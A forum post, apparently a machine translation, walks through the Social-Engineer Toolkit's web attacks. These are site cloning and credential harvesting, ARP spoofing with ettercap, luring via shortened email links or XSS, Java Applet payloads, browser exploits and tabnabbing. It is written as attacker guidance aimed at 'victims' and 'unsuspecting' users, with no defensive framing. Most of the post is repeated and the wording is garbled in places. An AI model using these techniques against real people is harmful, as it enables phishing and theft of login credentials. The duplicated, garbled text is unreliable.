- Joined
- May 15, 2017
- Messages
- 982
- Likes
- 760
- Points
- 1,045
This attack vector provides us with more interesting, sophisticated and
diverse ways of attacking users than the first. Speaking about the way through the
web, you can select a common feature (with the only exception) that goes through
attacks of this type - using a fake web page on an automatically
lifted web server. Although modern browsers and try to fight against
fake sites, the final decision about whether to trust or not to trust the site
is made by people, and sometimes it just brings human inattention.
As mentioned earlier, SET works great in conjunction with ettercap, and so that the
user does not notice the trick in the address bar, you can use ARP-spoofing.
In this case, the victim instead of the original site falls on our fake
site. Naturally, the victim must be on our own subnet.
You can also lure a user to our site with the help of XSS, email distribution, a
call from the provider’s technical support ... In principle, here the matter is limited only by
your imagination. Speaking of mail, it is worth remembering about the first attack vector, which
can work fine through the web. To do this, when sending to the text of the letter, we
add a URL that was previously compressed using the www.bit.ly service (or the
like). Naturally, the attack vector via mail does not provide the ability to
send a normal file, but no one bothers to replace it after creating the file
its on normal in /pentest/exploits/SET/src/program_junk/<name_file>.pdf.
Since this vector boils down to creating a fake website and luring a
victim to it , SET takes the first part of the plan and copes with it
perfectly, providing us with three options for creating this type of site:
when you hit it, a page appears with the message that
Java is required to view it, and detailed instructions on how to install it.
This template is best to choose when conducting a Java Applet attack, but more on that later.
The second mode is the most tasty - it is a complete cloning of the web page of any
site. To do this, it’s enough just to inform the toolkit of the required URL, and then it’s a
matter of technique. After a few seconds, we already have a copy of any web page. And the
last mode gives you the opportunity to raise your own website, indicating only the
directory on the disk where it is located. Here you can deploy as any
a large site, and just a page with errors "404", "Preventive
work in progress", "Loading ...", "The content of this site is incompatible with your
browser, try to open the link using IE". The main thing is that the victim
does not suspect anything and stay on the site for as long as possible.
The first thing we see when entering the web attack item is The Java Applet attack.
The Java Applet spoofs a fake Java Certificate, and if the target accepts it,
it runs metasploit payload. The main advantage of this method
is that we are not interested in which OS and which browser the
user is using, as long as Java is on his machine.
And, of course, nobody canceled the exploitation of browser vulnerabilities, and for
this purpose there is the item "The Metasploit Browser Exploit Method". Here SET on the
page created by us puts an exploit that will wait in the wings. Since
most of the new exploits are broken through to IE (it’s not a fact that the victim uses it),
it is possible, by applying social engineering, to force the user to follow the link
using IE — as practice shows, it is quite possible. The "Credential
Harvester" method is very simple both in implementation and in application, because its task
is to collect all the information that eared user entered on the page of the
site we prepared. So using it is very easy to merge
authentication data of an unsuspecting user.
Many people have a lot of tabs when surfing the Internet: for frequently
visited sites, to see something in the future, etc. With a large
number of open tabs and over time it is quite difficult to remember
what he opened himself, and what was thrown off to look through the ICQ, Skype, Jabber or
e-mail messenger . This is exactly what Tabnabbing attack is designed for. This attack forms a
special page that initially says "Please wait
while the site loads ...", and then when the user is tired of waiting for the
page to load , and he switches to another tab in the browser, our prepared
the page will change its look to the page from the popular email service where
we want to borrow authentication data. The next time the
victim views his tabs, he stumbles upon a very familiar
interface and may want to check his mail in this window (do not type the
same address again in the new one). And then our page works in the same way as
the Credential Harvester method. Yes, and since SET 0.6.1, it has become possible to
use SSL (both self-signed and pre-purchased certificate). So
the attack can be even more powerful and beautiful.
The "Man Left in the Middle Attack" method was introduced to the toolkit by a person with a nickname
Scythe and uses HTTP REFERER to collect data from the fields that the user has
filled out on the site. This method is the only one for which you can not
create a fake website, but you must have an XSS vulnerability on a real
site, the data from which we are interested in, for its implementation. It turns out that we
simply use XSS on a real site in Credential Harvester mode and get the
profit we need.
diverse ways of attacking users than the first. Speaking about the way through the
web, you can select a common feature (with the only exception) that goes through
attacks of this type - using a fake web page on an automatically
lifted web server. Although modern browsers and try to fight against
fake sites, the final decision about whether to trust or not to trust the site
is made by people, and sometimes it just brings human inattention.
As mentioned earlier, SET works great in conjunction with ettercap, and so that the
user does not notice the trick in the address bar, you can use ARP-spoofing.
In this case, the victim instead of the original site falls on our fake
site. Naturally, the victim must be on our own subnet.
You can also lure a user to our site with the help of XSS, email distribution, a
call from the provider’s technical support ... In principle, here the matter is limited only by
your imagination. Speaking of mail, it is worth remembering about the first attack vector, which
can work fine through the web. To do this, when sending to the text of the letter, we
add a URL that was previously compressed using the www.bit.ly service (or the
like). Naturally, the attack vector via mail does not provide the ability to
send a normal file, but no one bothers to replace it after creating the file
its on normal in /pentest/exploits/SET/src/program_junk/<name_file>.pdf.
Since this vector boils down to creating a fake website and luring a
victim to it , SET takes the first part of the plan and copes with it
perfectly, providing us with three options for creating this type of site:
- Gmail, Google, Facebook, Twitter and Java Required Preferences
- Site cloning
- Own site
when you hit it, a page appears with the message that
Java is required to view it, and detailed instructions on how to install it.
This template is best to choose when conducting a Java Applet attack, but more on that later.
The second mode is the most tasty - it is a complete cloning of the web page of any
site. To do this, it’s enough just to inform the toolkit of the required URL, and then it’s a
matter of technique. After a few seconds, we already have a copy of any web page. And the
last mode gives you the opportunity to raise your own website, indicating only the
directory on the disk where it is located. Here you can deploy as any
a large site, and just a page with errors "404", "Preventive
work in progress", "Loading ...", "The content of this site is incompatible with your
browser, try to open the link using IE". The main thing is that the victim
does not suspect anything and stay on the site for as long as possible.
The first thing we see when entering the web attack item is The Java Applet attack.
The Java Applet spoofs a fake Java Certificate, and if the target accepts it,
it runs metasploit payload. The main advantage of this method
is that we are not interested in which OS and which browser the
user is using, as long as Java is on his machine.
And, of course, nobody canceled the exploitation of browser vulnerabilities, and for
this purpose there is the item "The Metasploit Browser Exploit Method". Here SET on the
page created by us puts an exploit that will wait in the wings. Since
most of the new exploits are broken through to IE (it’s not a fact that the victim uses it),
it is possible, by applying social engineering, to force the user to follow the link
using IE — as practice shows, it is quite possible. The "Credential
Harvester" method is very simple both in implementation and in application, because its task
is to collect all the information that eared user entered on the page of the
site we prepared. So using it is very easy to merge
authentication data of an unsuspecting user.
Many people have a lot of tabs when surfing the Internet: for frequently
visited sites, to see something in the future, etc. With a large
number of open tabs and over time it is quite difficult to remember
what he opened himself, and what was thrown off to look through the ICQ, Skype, Jabber or
e-mail messenger . This is exactly what Tabnabbing attack is designed for. This attack forms a
special page that initially says "Please wait
while the site loads ...", and then when the user is tired of waiting for the
page to load , and he switches to another tab in the browser, our prepared
the page will change its look to the page from the popular email service where
we want to borrow authentication data. The next time the
victim views his tabs, he stumbles upon a very familiar
interface and may want to check his mail in this window (do not type the
same address again in the new one). And then our page works in the same way as
the Credential Harvester method. Yes, and since SET 0.6.1, it has become possible to
use SSL (both self-signed and pre-purchased certificate). So
the attack can be even more powerful and beautiful.
The "Man Left in the Middle Attack" method was introduced to the toolkit by a person with a nickname
Scythe and uses HTTP REFERER to collect data from the fields that the user has
filled out on the site. This method is the only one for which you can not
create a fake website, but you must have an XSS vulnerability on a real
site, the data from which we are interested in, for its implementation. It turns out that we
simply use XSS on a real site in Credential Harvester mode and get the
profit we need.